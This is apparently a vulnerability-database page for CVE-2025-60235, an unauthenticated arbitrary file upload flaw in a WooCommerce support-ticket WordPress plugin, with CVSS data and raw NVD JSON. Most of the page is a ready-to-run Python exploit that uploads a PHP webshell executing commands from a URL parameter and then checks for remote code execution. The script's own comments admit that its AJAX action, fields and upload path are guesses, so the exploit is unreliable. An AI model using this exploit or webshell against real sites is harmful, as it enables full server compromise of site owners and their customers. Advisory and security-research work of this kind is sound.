Security Vulnerability Report
中文
CVE-2025-60235 CVSS 10.0 CRITICAL

CVE-2025-60235

Published: 2025-11-06 16:16:06
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Plugify Support Ticket System for WooCommerce (Premium) support-ticket-system-for-woocommerce allows Using Malicious Files.This issue affects Support Ticket System for WooCommerce (Premium): from n/a through <= 2.0.7.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Support Ticket System for WooCommerce (Premium) <= 2.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-60235 PoC - Arbitrary File Upload in Support Ticket System for WooCommerce # This PoC demonstrates uploading a malicious PHP file import requests import sys def exploit(target_url, webshell_content): """ Exploit the arbitrary file upload vulnerability """ # Target endpoint for file upload (typical WordPress AJAX handler) upload_url = f"{target_url}/wp-admin/admin-ajax.php" # Malicious PHP file content (webshell) files = { 'file': ('shell.php', webshell_content, 'application/x-php') } # Additional fields that might be required data = { 'action': 'support_ticket_upload_file', 'ticket_id': '1' } try: print(f"[*] Uploading malicious file to {target_url}...") response = requests.post(upload_url, files=files, data=data, timeout=30) if response.status_code == 200: print(f"[+] File upload request sent successfully") print(f"[*] Response: {response.text}") # Attempt to access the uploaded file # Path may vary based on plugin configuration uploaded_path = f"{target_url}/wp-content/uploads/support-tickets/shell.php" print(f"[*] Attempting to access uploaded file at: {uploaded_path}") shell_response = requests.get(uploaded_path, timeout=10) if shell_response.status_code == 200: print("[+] Webshell uploaded successfully! Remote code execution possible.") return True else: print(f"[-] Upload failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-60235-poc.py <target_url>") sys.exit(1) target = sys.argv[1] webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" exploit(target, webshell)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60235", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:06.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Plugify Support Ticket System for WooCommerce (Premium) support-ticket-system-for-woocommerce allows Using Malicious Files.This issue affects Support Ticket System for WooCommerce (Premium): from n/a through <= 2.0.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/support-ticket-system-for-woocommerce/vulnerability/wordpress-helpdesk-support-ticket-system-for-woocommerce-plugin-2-0-7-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}